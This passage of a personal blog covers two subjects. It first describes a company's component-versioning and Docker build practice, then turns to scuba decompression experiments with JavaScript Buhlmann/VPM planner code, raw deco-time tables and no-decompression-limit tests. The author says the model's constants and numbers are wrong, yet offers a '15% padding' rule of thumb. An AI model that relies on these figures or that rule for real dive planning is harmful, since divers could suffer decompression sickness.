This is why Security teams are so derided by the Operations teams. Until recently and the advent of DevSecOps, they always added a downstream burden — they would publish a library that is “more secure” but breaks a fundamental API, and you as the developer, and occasionally the operator paid the price for updating all API calls, testing and verifying that everything works.

Our VFI structure flips this premise on its head. If the router-developer has a working VFI, and somehow the downstream container manager developer broke something, then their “version” in that VFI is not sanctioned. The burden is now on them to go fix it. However, since the router doesn’t require a dependency update or a rebuild, simply plugging in their fixed version in the VFI, is sufficient enough to get their upgrade pushed into production quite easily.

You’ll also notice how this structure puts our experimentation ability on steroids. Given content-based versioning, and feature-detection, we can plug a thousand different branches, with a thousand different features, experiments, implementations, etc. in a VFI, and move rapidly. If we have to make a breaking change to an API, we don’t really have to either “freeze a branch” or do code lockdowns. We just replace API V1 with V2, and then as various components make their changes, we update those in the VFI and roll out the change reliably, accurately, predictably, and most importantly, easily. We remove the burden on the API changer to somehow coordinate this massive org-wide migration, and yet we also unburden the consumers from doing some kind of lock-step code update.

All the while, we preserve our ability to make strict assertions about every component, and an overall VFI — is it secure? is it building? Is it passing tests? Does it support features? Has something regressed? We further preserve our ability to know what is being used and executed at all times, and where it came from.

Naturally, VFI’s themselves are content-versioned. 🙂 You’ll find us sending each other sample VFIs like so: Runtime@b383463cf0f42b9a2095b40fc4cc597443da47f2

Anyone in the company can use our VFI CLI to expand this into a json-blob, and that blob is guaranteed to be exactly what I wanted someone else to see, with almost no chance of mistake or miscommunication.

Isn’t this cool? We can stay loosey-goosey and experimentally hipster, and yet talk precisely and accurately about everything we consume!

You’ll almost never hear “Does the router work?” because nobody really cares if the router works or not. You’ll always hear conversations like, “What’s the latest VFI that supports scrambling?”, or “What’s the latest stable VFI that supports session isolation?”

Assertions are made over VFIs. We bless a VFI as an overall locked entity, and that is why long-time customers have been getting a monthly email from us with these blobs. 🙂 When we need to roll out a surgical patch, the overhead is so minimal, it is uncanny. If someone makes a surgical change to one component, they test that component, then publish a new VFI with that component’s version, and test the VFI for overall scenarios. The remaining 8 components that are reliable, stable, tested, see no touch or churn.

Components are self-describing

Runtime Independence

Alex and I are Erlang fanboys and it shows. 100% of Polyverse is built on a few core principles, and everything we call a “component” is really an Actor stylized strictly after the Actor Model.

A component is first and foremost a runtime definition; it is something that one can run completely on it’s own and it contains all dependencies, supporting programs, and anything else it needs to reliably and accurately execute. As you might imagine, we’re crazy about Docker.

Components have a few properties:

  1. A component must always exist in a single Git repository. If it has source dependencies, they must be folded in (denormalized.)
  2. Whenever possible a components runtime manifestation must be a Docker Image, and it must fold in all required runtime dependencies within itself.

This sounds simple enough, but one very important contract every component has, is that a component may not know implicitly about the existence of any other components. This is a critical contract we enforce.

If there is one thing I passionately detest above all else in software engineering, it is implicit coupling. Implicit coupling is “magic”. It is when you build a component that is entirely syntactically decoupled from the rest. If Component A somehow relies on Component B existing, and acting a very specific way, then Component A should have explicitly expressed that coupling. As an operator, it is a nightmare to run these systems! You don’t know what Component A wants, and to keep up public displays of propriety, doesn’t want to tell you. In theory Component A requires nothing else to work! In practice, Component A requires Component B to be connected to it in a very specific magical way.

We go to great lengths to prevent this from happening. When required, components are explicitly coupled, and are self-describing as to what they need. That means all our specs are in the code. If it is not defined in code, it is not a dependency.

Build Independence

We then take this runtime definition back to the development pipeline, and ensure that all components can be built with two guaranteed assumptions:

  1. That there be a “/bin/bash” that they can rely on being present (so they can add the #!/bin/bash line.)
  2. That there be a working Docker engine.

All our components must meet the following build contract:

docker build .

It really is that simple. This means that combined with the power of content-addresses, VFIs and commit-clouds, we always have a reliable and repeatable build process on every developers’ desktop — Windows, Linux or Mac. We can be on the road, and if we need a component we can do “docker build .” We can completely change out the build system, and the interface still remains identical. Whether we’re cross-compiling for ARM, or for an x86 server, we all have a clear definition of “build works” or “build fails”. It really is that simple.

Furthermore, because even our builders are “components” technically, they follow the same rules of content-addressing. That means at any given time you can go back two years into a Git repo, and build that component using an outdated build system that will continue to work identically.

We store all build configuration as part of the components repo, which ensures that when we address “router@<sha>” we are not only talking about the code, but the exact manner that version needed to be built in, or wanted to be built in.

Here too you’ll notice the affinity to two things at the same time:

  1. Giving developers complete freedom to do what they want, how they want — whatever QA frameworks, scripts, dependencies, packages, etc. that they need, they get. They don’t have to go talk to the “Jenkins guy” or the “builder team”. If they want something they can use it in their builder images.
  2. Giving consumers the capacity to reason about “what” it is someone is talking about in a comprehensive fashion. Not just code, but how it was built, what tests were run, what frameworks were used, what artifacts were generated, how they were generated, etc.

Where it all comes together

Now that we’ve talked about the individual pieces, I’ll describe the full development/build/release cycle. This should give you an overview of how things work:

  1. When code is checked in it gets to be pushed without any checks and balances, unless you’re trying to get onto master.
  2. You’re allowed to push something to master without asking either, with the contract that you will be reverted if anyone finds a red flag (automation or human.)
  3. Anyone can build any component off any branch at any time they want. Usually this means that nobody is all that aggressive about getting onto master.
  4. An automated process runs the docker build command and publishes images tagged with their Git commit-shas. For now it only runs off master.
  5. If the component builds, it is considered “unit tested”. It knows what it needs to do that.
  6. A new VFI is generated with the last-known-good-state of working components, and this new component tag is updated in the VFI, and the VFI is submitted for proper QA.
  7. Assertions such as feature availability, stability, etc. are made over a VFI. The components really don’t know each other and don’t take version-based dependencies across each other. This makes VFI generation dirt-cheap.
  8. When we release, we look for the VFI that has the most assertions tagged around it (reviewed, error-free, warning-free, statically-verified, smoke-test-passed, patch-verified, etc. etc.)
  9. In the dev world, everyone is generating hundreds of VFIs per day, just trying out their various things. They don’t need to touch other components for the most part, and there is little dependency-churn.

I hope this post sheds some light on how we do versioning, why we do it this way, and what benefits we gain. I personally happen to think we lose almost none of the “assertions” we need to ship reliable, stable and predictable code, and at the same time simultaneously allowing all developers a lot of freedom to experiment, test, prototype and have fun.

Calling deco at the first Deco Stop

Disclaimer: These numbers are most certainly “WRONG!” You should NOT use this post or anything from a random only tool to plan or execute dives. You WILL get bent. Not “may”, but WILL. You know this. DO NOT rely on this tool.

Here’s a scenario that should never happen, but to quote the eloquent Mr. Mackey, “There are no stupid questions. Only stupid people.”

I decided to answer the following question full well know the question sounds stupid:

Suppose you make it to your first deco stop and want to adjust your deco based on what happened between your max depth, and hitting the deco stop. Say you had a reg failure and had to fix it. Or a scooter got entangled in the line. Or you had a reverse squeeze so you had to pause for a bit longer. Now you’re AT your deco stop, and you’ve got two things – your average depth by the time you hit the stop, and your total runtime for the dive.

Given those two numbers, if you had to calculate deco, how much would it vary based on calculating it as a true multi-level dive where you accounted for the pause as a scheduled “level stop”?

Side note: Once again, remember the purpose of these questions isn’t about what should happen or should never happen, but to create a strong feedback loop in ensuring what should NEVER happen as a function of the cost/risk you incur when you do so. Basically if it should turn out that stopping mid way, and not keeping track of where you stopped and how long you stopped is going to add a ridiculous increase in deco, then you HAVE to make sure you remember it. If it should turn out, it doesn’t add more than a few minutes of deco based on your avg depth observed at your gas switch, then you can in an emergency, get the hell up to that gas switch, switch over, and run the numbers based on what you saw then.

The Program

Here’s a quick program I whipped up which lets you do just that:

//This function is a utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
 var totalTime = 0;
 for (var index = 0; index < diveplan.length; index++) {
 var segment = diveplan[index];
 totalTime = totalTime + segment.time;
 }
 return totalTime;
}

var buhlmann = dive.deco.buhlmann();
console.log("Second Level depth, Avg Depth at Deco Stop, Multi-Level Deco Time, Avg Depth Deco Time")
for (var nextLevelTime = 5; nextLevelTime <= 30; nextLevelTime += 5) {
 for (var nextLevel=190; nextLevel > 70; nextLevel -= 10) {
 var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
 plan.addBottomGas("18/45", 0.21, 0.35);
 plan.addDecoGas("50%", 0.50, 0);
 plan.addDecoGas("100%", 1.0, 0);
 plan.addDepthChange(0, dive.feetToMeters(200), "18/45", 5);
 plan.addFlat(dive.feetToMeters(200), "18/45", 25);
 var bottomTime = 30; //5 + 25 to start with
 var cumulativeDepth = (25 * 200) + (5 * 100); //Avg depth so far (25 mins at 200, and 5 minutes at 100 - which is mid-point when descending).
 
 //add a add depth change to next level
 var depthDiff = 200 - nextLevel;
 var timeToLevel = depthDiff/60;
 plan.addDepthChange(dive.feetToMeters(200), dive.feetToMeters(nextLevel), "18/45", timeToLevel);
 bottomTime += timeToLevel;
 cumulativeDepth += (timeToLevel * (nextLevel+(depthDiff/2)));
 
 //add a segment at next level
 plan.addFlat(dive.feetToMeters(nextLevel), "18/45", nextLevelTime);
 bottomTime += nextLevelTime;
 cumulativeDepth += (nextLevelTime * nextLevel);
 
 depthDiff = nextLevel - 70;
 timeToLevel = depthDiff/60; //This is aggressive since we won't hit 70 feet at 60 fpm
 plan.addDepthChange(dive.feetToMeters(nextLevel), dive.feetToMeters(70), "18/45", timeToLevel);
 bottomTime += timeToLevel;
 cumulativeDepth += (timeToLevel * (70+(depthDiff/2)));
 
 var avgDepthAtDecoBegin = cumulativeDepth/bottomTime;
 
 var decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
 
 var totalTime = calculateDiveTime(decoPlan);
 var decoTimeFromMaxDepth = totalTime - bottomTime;
 
 plan = new buhlmann.plan(buhlmann.ZH16BTissues);
 plan.addBottomGas("18/45", 0.21, 0.35);
 plan.addDecoGas("50%", 0.50, 0);
 plan.addDecoGas("100%", 1.0, 0);
 plan.addFlat(dive.feetToMeters(avgDepthAtDecoBegin), "18/45", bottomTime);
 decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
 totalTime = calculateDiveTime(decoPlan);
 var decoTimeFromAvgDepth = totalTime - bottomTime;
 
 console.log(nextLevel + ", " + nextLevelTime + ", " + avgDepthAtDecoBegin + ", " + decoTimeFromMaxDepth + ", " + decoTimeFromAvgDepth);
 }
}



 

The Results (raw data)

The results I got were:

Second Level depth, Avg Depth at Deco Stop, Multi-Level Deco Time, Avg Depth Deco Time
190, 5, 181.41255605381164, 56.29999999999997, 56.52945470852016
180, 5, 180.06726457399105, 55.29999999999996, 55.488450224215235
170, 5, 178.7219730941704, 54.29999999999996, 55.4474457399103
160, 5, 177.37668161434976, 53.29999999999997, 54.40644125560536
150, 5, 176.03139013452915, 51.99999999999998, 53.36543677130043
140, 5, 174.68609865470853, 50.999999999999964, 52.324432286995496
130, 5, 173.34080717488786, 49.99999999999997, 51.28342780269057
120, 5, 171.99551569506727, 49.999999999999964, 51.24242331838564
110, 5, 170.65022421524665, 48.69999999999998, 50.20141883408069
100, 5, 169.30493273542598, 47.699999999999974, 50.16041434977576
90, 5, 167.9596412556054, 45.69999999999998, 49.119409865470836
80, 5, 166.61434977578477, 45.69999999999998, 48.0784053811659
190, 10, 182.43083003952566, 66.29999999999997, 67.56049169960473
180, 10, 180.0592885375494, 64.29999999999998, 65.48820711462449
170, 10, 177.68774703557312, 63.299999999999976, 63.415922529644256
160, 10, 175.31620553359681, 60.99999999999997, 62.34363794466401
150, 10, 172.94466403162056, 58.99999999999998, 60.27135335968378
140, 10, 170.57312252964428, 56.99999999999998, 59.19906877470354
130, 10, 168.20158102766797, 54.699999999999974, 57.12678418972331
120, 10, 165.83003952569172, 52.69999999999997, 55.054499604743064
110, 10, 163.45849802371544, 50.69999999999997, 53.98221501976284
100, 10, 161.08695652173913, 48.39999999999998, 51.909930434782595
90, 10, 158.71541501976284, 47.399999999999984, 50.837645849802364
80, 10, 156.34387351778656, 45.39999999999997, 49.76536126482211
190, 15, 183.23321554770317, 77.59999999999997, 78.58494840989397
180, 15, 180.05300353356887, 73.29999999999995, 75.48801554770316
170, 15, 176.87279151943463, 71.29999999999995, 72.39108268551234
160, 15, 173.69257950530033, 67.99999999999997, 70.29414982332155
150, 15, 170.5123674911661, 64.99999999999997, 67.19721696113072
140, 15, 167.33215547703182, 62.69999999999998, 65.10028409893991
130, 15, 164.15194346289752, 59.699999999999974, 62.00335123674911
120, 15, 160.97173144876325, 57.69999999999998, 59.90641837455829
110, 15, 157.79151943462898, 54.39999999999997, 57.80948551236748
100, 15, 154.61130742049468, 51.39999999999998, 55.71255265017666
90, 15, 151.43109540636044, 49.13359999999998, 53.61561978798586
80, 15, 148.25088339222614, 46.13359999999998, 50.518686925795045
190, 20, 183.88178913738017, 87.59999999999998, 89.60471693290735
180, 20, 180.0479233226837, 83.29999999999998, 86.4878607028754
170, 20, 176.21405750798723, 80.29999999999998, 82.37100447284345
160, 20, 172.38019169329073, 75.99999999999999, 79.2541482428115
150, 20, 168.54632587859422, 71.99999999999997, 75.13729201277954
140, 20, 164.71246006389777, 68.69999999999999, 71.0204357827476
130, 20, 160.87859424920126, 64.69999999999997, 66.90357955271564
120, 20, 157.0447284345048, 61.399999999999984, 64.78672332268368
110, 20, 153.21086261980832, 57.39999999999997, 61.66986709265175
100, 20, 149.37699680511182, 54.13359999999999, 59.5530108626198
90, 20, 145.54313099041534, 51.13359999999998, 55.43615463258785
80, 20, 141.70926517571885, 47.13359999999998, 53.319298402555894
190, 25, 184.41690962099125, 97.59999999999998, 100.6210274052478
180, 25, 180.04373177842564, 92.29999999999998, 95.48773294460639
170, 25, 175.67055393586006, 88.29999999999998, 91.35443848396503
160, 25, 171.29737609329445, 82.99999999999999, 87.22114402332359
150, 25, 166.92419825072884, 78.99999999999997, 83.08784956268224
140, 25, 162.55102040816328, 74.69999999999999, 78.95455510204081
130, 25, 158.17784256559764, 70.69999999999997, 72.82126064139943
120, 25, 153.80466472303203, 65.39999999999998, 69.687966180758
110, 25, 149.43148688046648, 61.39999999999997, 65.5546717201166
100, 25, 145.05830903790087, 57.13359999999997, 61.42137725947519
90, 25, 140.6851311953353, 53.13359999999998, 58.28808279883379
80, 25, 136.31195335276968, 49.13359999999998, 55.1547883381924
190, 30, 184.86595174262735, 108.59999999999998, 113.63471420911527
180, 30, 180.04021447721178, 102.29999999999998, 107.4876257372654
170, 30, 175.21447721179626, 96.29999999999998, 101.34053726541555
160, 30, 170.3887399463807, 90.99999999999999, 94.19344879356568
150, 30, 165.56300268096513, 85.99999999999997, 89.04636032171581
140, 30, 160.73726541554961, 80.69999999999999, 83.89927184986593
130, 30, 155.91152815013405, 75.7, 78.75218337801608
120, 30, 151.08579088471848, 70.4, 74.60509490616622
110, 30, 146.26005361930297, 65.39999999999998, 70.45800643431636
100, 30, 141.4343163538874, 60.13359999999997, 65.31091796246646
90, 30, 136.60857908847183, 56.13359999999998, 61.1638294906166
80, 30, 131.78284182305632, 51.13359999999998, 57.01674101876673

The conclusions

Here’s a couple of quick conclusions I was able to draw:
1. If all you did was compute deco based on your avg depth + time after having hit the stop, the biggest difference I could find was a little over 6 minutes (and it was negative.) Meaning, if we did the entire dive at Avg depth, we’d be calling 6 minutes more at most.
2. The maximum deviation expressed in percentage points, was 13 percent. Meaning adding a safe 15% to what would be deco based on avg depth would be a good rule of thumb.
I haven’t played with greater depths or attempted to plot/chart these to get a visual “feel” for how the curves shape up. I haven’t tried VPM.

Recipes to play with “No Deco Limits”

For a technical, philosophical and every other view on No-Deco limits, go to scubaboard.

First let me elaborate on why the mathematical model is important and how to play with it.

Models allow reverse engineering (fitting)
This post is about understanding the mathematical model in terms of the NDLs we know and use. One of the most important things about any model is, once you have verified it in one direction (how much deco must I do for a specific dive), you can then run it in the other direction (how much can I dive, before I have mandatory deco.) You can then understand what parameters, adjustments, corrections, variations other people were using when they came up with the numbers they gave you.

This is a subtle point and one excites me the most. What this means is, if someone said to me, “Let’s dive to 100 feet, for 40 minutes, on 32%, and ascend while stopping two minutes every ten feet.”, I now have the tools guess their parameters.

Suppose they were using VPM, then I can reverse-engineer things like what bubble sizes they considered “critial”, and what their perfusion rates were assumed to be, etc. If they were using the Buhlmann, I can reverse-engineer their gradient factors.

This is awesome because it allows me to break down the black box a little – instead of whining about “My computer said 10 minutes, and yours said 20 minutes”, I can whine in a far more specific and deeply annoying way – “Oh I see, my computer is assuming critical He bubble size to be 0.8 microns, but yours is assuming 0.5 microns.” Remember kids – you shouldn’t always whine, but when you do, make it count!

When your computer has a “conservativism factor”, what does that mean? Is it simply brute-multiplying each stop by that factor? Is it multiplying the shallow stops? Is it a coefficient used in a curve-fitting model, if let’s say it’s trying to fit a curve like a spline or bezier to “smoothen out the ascent”? Conservativism factor “4” makes you no more intelligent about what’s going on, than saying, “These are the adjustments/corrections I make.”

While these ARE “just models”, models are nothing if they are not properly parameterized.

Here again, existing software came short in what I could do with it. The GUI is a great tool for a narrow specific task. But when exploring the model, nothing is more useful and powerful than being able to play with it programmatically. Once I begin posting recipes you’ll know what is so fascinating about “playing with it”.

If you’re a fan of the Mythbusters, you will see them refer to this as, producing the result.

Models allow study of rates-of-change (sensitivity analysis)

The other very important aspect of a model, even the constants are wrong, is the overall rate of change, or growth. Also called sensitivity analysis (meaning how sensitive is my model to which parameters.)

Let us say we had a few things in our control – ppO2, ppN2, ppH2, bottom time, ascent rate, descent rate, stops.

What a mathematical model allows us to learn (and should help us learn), is how sensitive the plans are to each of these parameters, even if specific constants are wrong.

Let me put it this way – if you wanted to guess the sensitivity of a “car” to things like – weight, number of gear shifts, size of wheels, etc., and you had a hummer to study with, and but had to somehow extend that knowledge to an sedan, how would you do it?

The “constants” are different in both. But the models aren’t. An internal combustion engine has an ideal RPM rate where it provides the maximum torque for minimum fuel consumption. The specific rev rate will be different. And you can’t account for that. However, the “speed at which inefficiency changes”, is a commonality in all internal combustion engines. Unless the  sedan is using a wenkel engine, the rate-of-change characteristics still apply. Even if the hummer’s ideal RPM 2000, and the sedan’s is 1500, the questions we can still study are – when I deviate 10% from the ideal, how does that affect fuel consumption, and torque?

So even if the software/constants I wrote are entirely wrong (which they probably are), they still serve a valuable tool in studying these changes.

A study in NDLs

Naturally one of the first unit tests I wrote for the algorithm, was PADI dive tabes: https://github.com/nyxtom/dive/blob/master/test/dive_test.js#L646

The point here was to recreate an approximation of the dive tables. What fascinated me was how much subtle understanding there is behind that number though.

First let’s define an NDL as: Maximum time at a depth, with an ascent ceiling of zero.

What this means is, whether you use Buhlmann, or VPM or whatever model you like, the NDL is the time after which you can ascend straight to the surface (depth of zero meters.)

So what happens when we run pure Buhlmann without a gradient factor?

(This snippet is meant to be executed here: http://deco-planner.archisgore.com/)

var buhlmann = dive.deco.buhlmann();
var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
plan.addBottomGas("Air", 0.21, 0.0);
plan.ndl(dive.feetToMeters(100), "Air", 1.0);

//Result is 16

That’s a bit strange isn’t it? The official NDL on air is closer to 19 or 20 minutes (with a “mandatory safety stop”.)

Does it mean my model is wrong? My software is wrong? Compare it with different depths, and you’ll find it gives consistently shorter NDLs. What gives?

Let’s try fudging the conservativism factor a bit.

var buhlmann = dive.deco.buhlmann();
var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
plan.addBottomGas("Air", 0.21, 0.0);
plan.ndl(dive.feetToMeters(100), "Air", 1.1);


//Result is 19

That’s just about where we expect it to be. This tells me that the NDL could have been computed with a less conservative factor. But is there something I’m missing?

Wait a minute, this assumes you literally teleport to the surface. That’s not usually the case. Let’s run the same NDL with a 30-feet-per-minute ascent (this time we have to use the getCeiling method).

for (var bottomTime = 1; bottomTime <= 120; bottomTime++) {
 var buhlmann = dive.deco.buhlmann();
 var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
 plan.addBottomGas("Air", 0.21, 0.0);
 plan.addFlat(dive.feetToMeters(100), "Air", bottomTime);
 plan.addDepthChange(dive.feetToMeters(100), 0, "Air", 3);
 
 if (plan.getCeiling(1.0) > 0) {
 console.log("NDL for 100 feet is: " + (bottomTime-1));
 break;
 }
}
NDL for 100 feet is: 19

That’s interesting. For the same parameters, if we assume an ascent of two minutes, our NDL went up – we can stay down longer if we are ASSURED of a 30-feet-per-minute ascent at the end.

Now remember these numbers are entirely made up. My constants are probably helter-skelter. You shouldn’t use the SPECIFIC numbers on this model. But there’s something intuitive we discovered.

Let’s try it again with a 3 minute safety stop at 15 feet:

for (var bottomTime = 1; bottomTime <= 120; bottomTime++) {
 var buhlmann = dive.deco.buhlmann();
 var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
 plan.addBottomGas("Air", 0.21, 0.0);
 plan.addFlat(dive.feetToMeters(100), "Air", bottomTime);
 plan.addFlat(dive.feetToMeters(15), "Air", 3);
 
 if (plan.getCeiling(1.0) > 0) {
 console.log("NDL for 100 feet is: " + (bottomTime-1));
 break;
 }
}
NDL for 100 feet is: 22

Once again these numbers make sense – if we are ASSURED of a 3 minute stop at 15 feet, our NDL goes up. How interesting.

This gives you a better idea of a “dynamic” dive. You aren’t exactly teleporting from depth to depth, and those ascents and descents matter. Try this for different gasses.

Dive Planner Recipes

This is really for my personal reference. If it helps you, I’m glad.

A couple of weeks ago, I wrote this tool (http://deco-planner.archisgore.com.) You can go read the history, motivation, etc. on that page and the github repo ad nauseum.

NOTE: Why is this important/useful? Don’t computers tell you how much deco you should do? Yes they do exactly that, and do it pretty well. Now here’s what a computer won’t tell you – how much deco would you be looking at _if_ you extended the dive by 10 minutes? Let’s say that by extending it 10 minutes, or pushing it down by 10 feet more, your obligation jumps from 30 minutes to 50 minutes. That is objectively two-thirds more gas than you planned for. This tool/post is about understanding what those shapes are so you can decide, even if you had your computer telling you what your deco was, whether you’re going to like doing it or not.

This post is about how to effectively use that tool with some pre-canned recipes to generate information cheap/easy than any other tool I know of or can think of.

The first recipe (and the primary reason I built the entire damn thing, is to get an idea of how ratio-deco changes over different bottom times. Does it grow linearly? Non-linearly? etc. Say you’re at 150 feet for “x” minutes longer than your plan, and you just don’t happen to have a computer to do your math. Do you have a vague idea how the shape of increments changes?)

Let’s find the answer to that very question quickly.

Deco time change as a ratio of bottom time:

//This function is a utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
    var totalTime = 0;
    for (var index = 0; index < diveplan.length; index++) {
        var segment = diveplan[index];
        totalTime = totalTime + segment.time;
    }
    return totalTime;
}

//In this loop we'll run a 150 foot dive for bottom times between 1 to 120 
// minutes and calculate total dive time, find deco time (by subtracting 
// bottom time), and store it in the array.
for (var time = 1; time <= 120; time++) {
    var buhlmann = dive.deco.buhlmann();
    var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("2135", 0.21, 0.35);
    plan.addDecoGas("50%", 0.50, 0);
    plan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    plan.addFlat(dive.feetToMeters(150), "2135", time);
    var decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    var totalTime = calculateDiveTime(decoPlan);
    var decoTime = totalTime - time;
    console.log(decoTime);
}

What’s really cool is, I can now chart that decoTimes array using Excel or Numbers or whatever your spreadsheet is. I just paste it in plot.ly, and get this:

Deco Time change as a ratio of depth:

Now let’s look at how does decompression change if my depth came out different than anticipated? We can generate deco schedules for that too:

//This function is a utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
    var totalTime = 0;
    for (var index = 0; index < diveplan.length; index++) {
        var segment = diveplan[index];
        totalTime = totalTime + segment.time;
    }
    return totalTime;
}

//In this loop we'll run a 150 foot dive for bottom times between 1 to 120 
// minutes and calculate total dive time, find deco time (by subtracting 
// bottom time), and store it in the array.
for (var depth = 120; depth <= 180; depth++) {
    var buhlmann = dive.deco.buhlmann();
    var plan = new buhlmann.plan(buhlmann.ZH16BTissues);
    plan.addBottomGas("2135", 0.21, 0.35);
    plan.addDecoGas("50%", 0.50, 0);
    plan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    plan.addFlat(dive.feetToMeters(depth), "2135", 30);
    var decoPlan = plan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    var totalTime = calculateDiveTime(decoPlan);
    var decoTime = totalTime - 30;
    console.log(decoTime);
}

And we get this:

 

Finally, let’s plot how VPM-B compares to Buhlmann. In this case, we have to add a depth change from 0 feet to 150 feet, because VPM is very sensitive to the slopes unlike Buhlmann which only worries about tissue loading (more on this later, I promise.)

Here’s the code to generate Buhlmann vs VPM deco times for the same dive profile:

//This function is a utility to get total dive time out of all segments
var calculateDiveTime = function(diveplan) {
    var totalTime = 0;
    for (var index = 0; index < diveplan.length; index++) {
        var segment = diveplan[index];
        totalTime = totalTime + segment.time;
    }
    return totalTime;
}

//In this loop we'll run a 150 foot dive for bottom times between 1 to 120 
// minutes and calculate total dive time, find deco time (by subtracting 
// bottom time), and store it in the array.
for (var time = 1; time <= 120; time++) {
    var buhlmann = dive.deco.buhlmann();
    var bplan = new buhlmann.plan(buhlmann.ZH16BTissues);
    bplan.addBottomGas("2135", 0.21, 0.35);
    bplan.addDecoGas("50%", 0.50, 0);
    bplan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    bplan.addDepthChange(0, dive.feetToMeters(150), "2135", 5);
    bplan.addFlat(dive.feetToMeters(150), "2135", time);
    var bdecoPlan = bplan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    var btotalTime = calculateDiveTime(bdecoPlan);
    var bdecoTime = btotalTime - time - 5;

    var vpm = dive.deco.vpm();
    var vplan = new vpm.plan();
    vplan.addBottomGas("2135", 0.21, 0.35);
    vplan.addDecoGas("50%", 0.50, 0);
    vplan.addDecoGas("Oxygen 100%", 1.0, 0.0);
    vplan.addDepthChange(0, dive.feetToMeters(150), "2135", 5);
    vplan.addFlat(dive.feetToMeters(150), "2135", time);
    var vdecoPlan = vplan.calculateDecompression(false, 0.2, 0.8, 1.6, 30);
    var vtotalTime = calculateDiveTime(vdecoPlan);
    var vdecoTime = vtotalTime - time - 5;

    console.log(bdecoTime + " " + vdecoTime);
}

And the chart that comes out:

Scuba Diving tools

At some point I made a page to document random scuba tools I build/will-build/want-to-build/want-others-to-build.

The last part is a bit tricky. I want many things – and asking others to build something is painful. You don’t always get what you want. You don’t always like what you get. You don’t always get what you want, and how you like it at a price you’re willing to pay for it.

So in a very terribly-theme’d page (because I absolutely suck at designing web pages), here’s a link to some tools I’m working on:

https://archisgore.com/scuba-diving-resources/

The next big couple of things coming up are – a better UI (especially plotter/charter) for the dive planner, and a RaspberryPi Zero based dive computer (on which you can write deco plans on a full linux distro.)

Don’t hold your breath though. My history with these things is very haphazard depending on how obsessive I feel the need/want.